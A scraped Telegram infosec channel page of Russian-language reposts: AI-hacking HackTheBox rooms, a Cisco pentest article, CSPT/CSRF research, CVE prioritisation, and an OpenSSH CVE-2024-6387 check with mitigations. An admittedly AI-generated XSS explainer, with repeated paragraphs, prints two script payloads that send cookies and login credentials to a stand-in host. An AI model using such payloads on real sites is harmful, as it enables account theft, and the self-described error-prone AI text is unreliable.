uk
Feedback
Fsecurity | HH

Fsecurity | HH

Відкрити в Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Показати більше
2 010
Підписники
-124 години
+27 днів
-1230 день
Архів дописів

Repost from PWN AI
На HackTheBox стало появлятся все больше комнат, где надо атаковать ИИ. Возможно, через некоторое время я поделюсь райтапами(
На HackTheBox стало появлятся все больше комнат, где надо атаковать ИИ. Возможно, через некоторое время я поделюсь райтапами(главное чтобы это не увидели модераторы HTB 😂😂😂). Спасибо за наводку @lightnightmoon

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

Repost from N/a
sticker.webp0.36 KB

Repost from N/a
👋Привет! На связи Ximera-Chan🎧 XSS (Cross-Site Scripting) является уязвимостью в веб-приложениях, которая позволяет злоумышленникам внедрять код JavaScript в страницы веб-сайтов, которые затем выполняются в браузере посетителей. Это может привести к краже куки-файлов, несанкционированному доступу к конфиденциальной информации и другим опасным последствиям. Примеры XSS: * Внедрение кода JavaScript в комментарий блога или сообщение в социальных сетях, который украдет куки-файлы у посетителей страницы. * Внедрение кода JavaScript в форму регистрации или вход, который позволит злоумышленнику получить доступ к аккаунту пользователя. Инструменты для поиска уязвимостей XSS: * ZAP (Zed Attack Proxy) - инструмент для тестирования безопасности веб-приложений, который может обнаруживать уязвимости XSS. * Burp Suite - набор инструментов для тестирования безопасности веб-приложений, который включает в себя модуль для обнаружения уязвимостей XSS. * OWASP Xenotix XSS Exploit Framework - автоматизированный фреймворк для обнаружения и эксплуатации уязвимостей XSS. Примеры XSS: * Внедрение кода JavaScript в комментарий блога или сообщение в социальных сетях, который украдет куки-файлы у посетителей страницы. * Внедрение кода JavaScript в форму регистрации или вход, который позволит злоумышленнику получить доступ к аккаунту пользователя. Инструменты для поиска уязвимостей XSS: * ZAP (Zed Attack Proxy) - инструмент для тестирования безопасности веб-приложений, который может обнаруживать уязвимости XSS. * Burp Suite - набор инструментов для тестирования безопасности веб-приложений, который включает в себя модуль для обнаружения уязвимостей XSS. * OWASP Xenotix XSS Exploit Framework - автоматизированный фреймворк для обнаружения и эксплуатации уязвимостей XSS. Вот примеры XSS: Пример 1: Злоумышленник может внедрить код JavaScript в комментарий блога, который украдет куки-файлы у посетителей страницы. Например:
<script>document.location='http://malicious-site.com/steal-cookies.php?cookies='+document.cookie</script>
Пример 2: Злоумышленник может внедрить код JavaScript в форму регистрации или вход, который позволит злоумышленнику получить доступ к аккаунту пользователя. Например:
<script>document.location='http://malicious-site.com/steal-password.php?username='+document.getElementsByName('username')[0].value+'&password='+document.getElementsByName('password')[0].value</script>
В этих примерах злоумышленник использует тег <script> для внедрения кода JavaScript в страницу веб-сайта. Затем код выполняется в браузере посетителей сайта, позволяя злоумышленнику украсть куки-файлы или получить доступ к аккаунту пользователя. P.s. могут быть ошибки... Генерация Ai [Ximera-Chan]

Repost from Caster
Релиз моей статьи о пентесте Cisco IOS Caster - Lyrica Genre: Offensive Label: exploit.org Release Date: 3 July 2024 Performe
Релиз моей статьи о пентесте Cisco IOS Caster - Lyrica Genre: Offensive Label: exploit.org Release Date: 3 July 2024 Performed by: Caster Written by: Magama Bazarov Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec) https://blog.exploit.org/caster-lyrica

Ребята из Doyensec опубликовали рисёрч по атакам связанным с client-side path traversal и csrf. Я этот доклад застал лично и было очень интересно послушать историю от самих исследователей, и по задавать вопросы. Примеры с несколькими CVE на Mattermost показывали очень доходчиво саму концепцию атаки и риски. Вместе с исследованием они поделились бурповым плагином, который должен помочь находить места в которых есть высокий шанс встретить Client-Side Path Traversal. Кратенький блог пост: https://blog.doyensec.com/2024/07/02/cspt2csrf.html Полноценный Whitepaper (очень советую прочитать): https://www.doyensec.com/resources/Doyensec_CSPT2CSRF_Whitepaper.pdf

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

Repost from Blue (h/c)at Café
🪲Пора поговорить про уязвимости (опять) Даа, давно меня не было в уличных гонках тг-канале. На это было много причин, и выгорание, и смена места работы, и желание отдохнуть, и остальные отговорки. Сегодня тема будет далеко не для новичков, скорее для тех, кто ищет способ оптимизировать и/или облегчить себе жизнь. Да, я понимаю, что такое уже есть у крупных компаний, но для малого и среднего отдела — самое то. Обо всём по порядку. Так про что мы ? 🔵CVSS
Common Vulnerability Scoring System (CVSS) — это стандартная система оценки уязвимостей, которая определяет их серьезность
🔵EPSS 🔵CISA KEV 🔵и то, что их объединяет
Охх, сколько же новых сокращений 👍
Что такое Oops EPSS Эксплуатационная система оценки вероятности (EPSS) — это инструмент, который предсказывает вероятность эксплуатации уязвимостей ✨. EPSS использует массив данных из различных источников, включая исторические данные об эксплуатации, характеристики уязвимостей и разведывательные данные об угрозах. Оценка EPSS варьируется от 0 до 1, где более высокие значения указывают на большую вероятность эксплуатации. ❕ Что такое CISA KEV (не kekw!) CISA Known Exploited Vulnerabilities (KEV) — это список уязвимостей, которые, как известно, уже были использованы злоумышленниками. Этот список поддерживается Агентством по кибербезопасности и инфраструктурной безопасности США (CISA).
Ждем аналог от наших друзей из ФСТЭК 😎
Ну ладно, вот мы и разобрались с основами, но а что теперь, как нам с ними работать ? 😜 CVE Prioritizer 💻 Ссылка на инструмент — ТЫК Инструмент помогает организациям эффективно распределять ресурсы, используя данные из различных источников, таких как CVSS, EPSS и CISA Known Exploited Vulnerabilities (KEV). Мы нашли "серебряную пулю"? - Комбинирование оценок из наших источников - Интеграции с различными источниками данных (.env) - Python 🐍 - Настраиваемые аналитические данные (Priority) - Гибкость ввода и вывода данных (json, csv, list) 🤨 Чего мне не хватило - Быстрого добавления своих источников - Правил интеграции в тот же DefectDojo - Я не Лид команды (проблема во мне) Подытожим Делай хорошее, плохое не делай. Шутка хорошая, но в ней есть истина. Нужно следить за уязвимостями, особенно сейчас, а то все эти уязвимости в vmware horizon или polyfill.js дают нам понять, что за ними следят только злоумышленники... Или закрываются waf-ом (глупое решение) #appsec

🔑 Вызов мастеру ключей Инжектим шелл-код в память KeePass, обойдя антивирус В журнале рассмотрено: ⏺ ShadowCoerce: Как работ
🔑 Вызов мастеру ключей
Инжектим шелл-код в память KeePass, обойдя антивирус
В журнале рассмотрено:ShadowCoerce: Как работает новая атака на Active Directory ⏺ Herpaderping и Ghosting: Изучаем два новых способа скрывать процессы от антивирусов ⏺ Электронная психобумага: Критическая уязвимость в Java позволяет подделывать электронные подписи и ключи ⏺ Фундаментальные основы хакерства: Ищем операнды при взломе программ; Ищем тестовые строки в чужой программе ⏺ HTB Overffow: Упражняемся в атаке padding oracle и эксплуатируем баг в ExifTool ⏺ HTB Toby: Взламываем сервер через череду чужих бэкдоров ⏺ HTB Backdoor: Взламываем сайт на Wordpress и практикуемся в разведке ⏺ Решетки на «Окна»: Защищаем компьютеры с Windows 10 и особенно – с Windows 11 ⏺ Секреты PowerShell: Пишем HTTP-запросы и парсим страницы на PowerShell Автор: Журнал хакер Год выхода: 2022 🗄 Читать журнал – линк. // Не хакинг, а ИБ

Repost from N/a
! upd Здарова всем, там race condition по sshd; Скрипт проверки: https://github.com/xaitax/CVE-2024-6387_Check Идея проверки,
! upd Здарова всем, там race condition по sshd; Скрипт проверки: https://github.com/xaitax/CVE-2024-6387_Check Идея проверки, проверяется версия удаленного сервера, уязвимые версии: 'SSH-2.0-OpenSSH_8.5p1' 'SSH-2.0-OpenSSH_8.6p1' 'SSH-2.0-OpenSSH_8.7p1' 'SSH-2.0-OpenSSH_8.8p1' 'SSH-2.0-OpenSSH_8.9p1' 'SSH-2.0-OpenSSH_9.0p1' 'SSH-2.0-OpenSSH_9.1p1' 'SSH-2.0-OpenSSH_9.2p1' 'SSH-2.0-OpenSSH_9.3p1' 'SSH-2.0-OpenSSH_9.4p1' 'SSH-2.0-OpenSSH_9.5p1' 'SSH-2.0-OpenSSH_9.6p1' 'SSH-2.0-OpenSSH_9.7p1' Сам PoC к уязвимости, был написан на С, на x32 систем, для х64 пока нет, но думаю что вопрос времени; Пока есть три варианта, митингации (но можно таким образом вызвать отказ в обслуивании):
LoginGraceTime=0
И пропатчить бинарь из portable версии sshd (чет мне не очень этот вариант нравится); Третий вариант, обновить пакеты: openssh-server openssh-client openssh-sftp-server До версии 9.8p1 * Задетектить атаку можно, по логам sshd (journalctl -t sshd), будут сообщения вроде (Timeout before authentication);